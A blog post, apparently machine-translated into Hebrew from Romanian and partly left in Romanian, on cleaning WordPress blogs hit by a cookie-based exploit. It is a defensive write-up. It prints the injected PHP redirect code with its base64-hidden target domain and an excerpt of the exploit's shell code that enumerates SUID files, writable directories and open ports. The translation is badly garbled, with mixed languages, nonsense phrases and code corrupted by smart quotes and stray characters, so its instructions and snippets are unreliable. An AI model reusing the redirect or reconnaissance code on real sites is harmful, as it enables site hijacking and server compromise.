בחודש האחרון קיבלנו אזהרות של וירוס בבלוג מכמה מבקרים. בתחילה התעלמתי מהאזהרות, כי היה לי אנטי -וירוס די טוב (קספרסקי משנת 2009) ולמרות שהייתי בבלוג הרבה זמן, מעולם לא קיבלתי את התראת הנגיף (.. ראיתי משהו חשוד, שברענון הראשון נעלם. סוף סוף ...).
לאט לאט, לאט לאט החלו להראות וריאציות גדולות של תנועת המבקריםלאחר מכן לאחרונה התנועה פחתה ללא הרף ויותר ויותר החלה לספר לי את זה stealthsettings.com זהו וירוסאטו אתמול קיבלתי ממישהו צילום מסך שנעשה כאשר האנטי -וירוס חסם א תַסרִיט מ- stealthsettings.com:Trojan-clicker.html.iframe.grו הוא די משכנע אותי לחפש אותי בכל המקורות. הרעיון הראשון שעלה בראש היה לעשות שדרוג בגרסה האחרונה של וורדפרס (2.5.1), אך לא לפני שמחקים את כל הקבצים של סקריפט וורדפרס הישן גיבוי במסד הנתוניםו נוהל זה לא נתן שום תוצאה וכנראה שהיה לוקח זמן רב לתת לי את השיח במקום בו הבועה יאוגן בדיון קפה, שהוא מצא קישור בגוגל וזה יהיה טוב לראות את זה.
Mydigitallife.info, פרסמו מאמר עם הכותרת: "גרזן וורדפרס: התאוששות ותיקנו את גוגל ומנוע חיפוש או לא תנועת עוגיות מופנית ל- Needs.info, anyresults.net, Golden-info.net ואתרים לא חוקיים אחרים", מה סוף החוט שהייתי צריך.
זה בערך א לְנַצֵל מאת וורדפרס מבוסס על עוגיה, שלדעתי מורכבת מאוד ויוצרת כספר. חכם מספיק כדי לעשות א הזרקת SQL במסד הנתונים בבלוג- כדי ליצור משתמש בלתי נראה לבדיקה שגרתית פשוטה לוּחַ מַחווָנִים->משתמשים- כדי לבדוק את מנהלי השרתים והקבצים "הניתנים" (שיש להם CHMOD 777), לחפש ול לְבַצֵעַ קבצים עם הרשאות קבוצתיות או אפילו שורש. אני לא יודע מה שמו של הניצול ואני רואה שיש מעט מאמרים כתובים על כך, למרות העובדה שיש הרבה בלוגים נגועים, כולל מרומניה. אוקי ... אנסה לנסות להסביר הכללות על הנגיף הזה.
מה הנגיף עושה?
ראשית, זה מכניס למקורות הדפים בבלוגים, קישורים בלתי נראים למבקרים אך גלויים וניתנים לאינדקס למנועי חיפוש, ובמיוחד את גוגל. בדרך זו דרגת העברה לדרגת אתרים המצוינים על ידי התוקףו שנית, אחד נוסף מוכנס קוד ניתוב מחדש כתובת אתר, למבקרים המגיעים מגוגל, לייב, יאהו, ... או מקורא RSS ואין להם את האתר ב עוּגִיָהו וכן אנטי -וירוס מזהה את ההפניה מחדש כ- Trojan-clicker.htmlו
תסמינים:
הירידה העצומה בתנועת המבקריםבמיוחד בבלוגים שבהם רוב המבקרים מגיעים מגוגל.
לְזַהוֹת: (מכאן הבעיה מסובכת למי שלא יודע כמה phpmyadmin, php ו- linux)
THE. זָהִיר!!! ראשית הפוך גיבוי במסד הנתונים !!!
1. בדוק אם יש מקורות קבצים index.php- Header.Php- Photer.Phpמהנושא של הבלוג ובדוק אם יש קוד שמשתמש בהצפנה בסיס 64 או שהוא מכיל "אם ($ ser ==" 1? && Siefof ($ _ cookie) == 0) "הפורמה:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... או משהו דומה. מחק את הקוד הזה!
לחץ על PE דמיין ...
בצילום המסך שלעיל בחרתי מהטעות ו "<? php get_header (); ?>"הקוד הזה חייב להישאר.
2. שימוש phpmyadmin והלך למסד הנתונים לטבלה WP_USERSאיפה אתה בודק אם יש משתמש חסר שם, שנוצר בתאריך של 00: 00: 00 0000-00-00 (זה אפשרי בשדה user_login לכתוב "וורדפרס". שימו לב למזהה של המשתמש הזה (שדה מזהה) ואז נגבו אותו.
לחץ על PE דמיין ...
*זה בקו הירוק, חייב להימחק ולשמור עליו. במקרה שלו מְנוּמנָם, היה מזהה = 8 ו
3. Mergeti in tabelul wp_usermeta, unde trebuie sa localizati אתה לִמְחוֹק liniile aferente ID-ului (unde in campul user_id apare valoarea ID-ului sters) .
4. In tabelul wp_option, היכנס active_plugins si vedeti ce plugin este activat suspect. Acesta poate folosi terminatii de genul _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc combinatii de extensii imagine bogus cu _old si _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Stergeti acest plugin, dupa care mergeti in blog –> לוח מחוונים -> Plugins, unde dezactivati si activati un plugin oarecare.
Click pe imagine, sa vedeti cum apare fisierul virusat in active_plugins.
Urmati calea pe FTP sau SSH, indicata in active_plugins si stergeti fisierul de pe server.
5. Tot in phpMyAdmin, in tabelul wp_option, gasiti si stergeti randul care contine “rss_f541b3abd05e7962fcab37737f40fad8"והשורה"Internal_links_cache ”ו
ב- Internal_links_cache, קישורי הספאם המופיעים בבלוג ואחד ממוקמים Google Adsense, של ההאקר.
6. מומלץ הוא לעשות זאת שנה סיסמה של כניסה לבלוג ו- SA חיסל את כל המשתמשים החשודיםו שדרג לגירסה האחרונה של WordPress והגדיר את הבלוג כדי להפסיק לרשום משתמשים חדשים. אין אובדן ... הם יכולים להגיב ובלתי.
ניסיתי לעיל להסביר כמה, מה לעשות במצב כזה, לנקות את הבלוג של הנגיף הזה. הבעיה הרבה יותר רצינית ממה שהיא נראית ובשום אופן לא נפתרה, מכיוון שמשתמשים בהן פגיעויות אבטחה של שרת האינטרנט האירוח, עליו נמצא הבלוג.
כאמצעי האבטחה הראשון שיש לו גישה ל Ssh, כדי לבצע כמה בדיקות בשרת כדי לראות אם יש יותר קבצים כמו * _old * ו- * _NEW. * עם הסיומות.היה, .jpeg, .pngg, .jpggו יש למחוק קבצים אלה. אם נשנה שם קובץ, למשל top_right_old.giff ב top_right_old.php, אנו רואים שבקובץ הוא בדיוק קוד שרת הניצול.
כמה אינדיקציות מועילות לבדיקה, ניקוי ואבטחת שרת. (דרך SSH)
1. CD /TMP ובדוק אם יש תיקיות כמו TMPVFLMA או שילובים אחרים של שמות דומים ומחקים אותם. ראה בתמונת המסך למטה, שתי תיקיות כאלה בעיניי:
RM –RF numefolder
2. בדוק ובטל (שנה את ה- CHMOD) ככל האפשר את התיקיות עם תכונות CHMOD 777
מצא את כל הקבצים הניתנים לכתיבה ב- DIR הנוכחי: מצא. -קל f -perm -2 -ls
מצא את כל הספריות הניתנות לכתיבה ב- DIR הנוכחי: מצא. -קל D -perm -2 -ls
מצא את כל הספריות והקבצים הניתנים לכתיבה ב- DIR הנוכחי: מצא. -פרם -2 –LS
3. חפש קבצים חשודים בשרת.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, זָהִיר!!! לקבצים שקובעים את הסיביות דָרוֹם וכן לְהַחלִיק עַל מִחלָקַיִםו קבצים אלה מבצעים עם הרשאות המשתמש (הקבוצה) או השורש, לא עם אלה של המשתמש שמבצע את הקובץ. קבצים אלה יכולים להוביל לפשרה שורשית, אם יש בעיות אבטחה. אם אינך משתמש בקבצים עם BITS SUID ו- SGID, ביצוע "chmod 0 ” עליהם או הסר את ההתקנה של החבילה המכילה אותם.
הניצול מכיל איפשהו במקור ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}... בעיקרון בדרך זו הוא מוצא את הגזעים בביטחון. פתיחת יציאות, דירקטורים "ניתנים לכתיבה" וביצוע קבצים עם הרשאות קבוצתיות / שורש.
אני חוזר עם פרטים ...
כמה בלוגים נגועים: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
Blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... והרשימה יכולה להמשיך ... מאוד.
אתה יכול לבדוק אם בלוג הוא וירוס, באמצעות מנוע החיפוש של גוגל. לְהַעְתִיק & הדבק:
אתר: www.blegoo.com קנה
לילות טובים ותגדל לתפקיד;) בקרוב אני חושב שאוגן יבוא, premiebible.imprevizible.com.
BRB :)
ב: תשומת לב! שינוי נושא הוורדפרס או השדרוג ל- WordPress 2.5.1, אינו פיתרון להיפטר מנגיף זה.
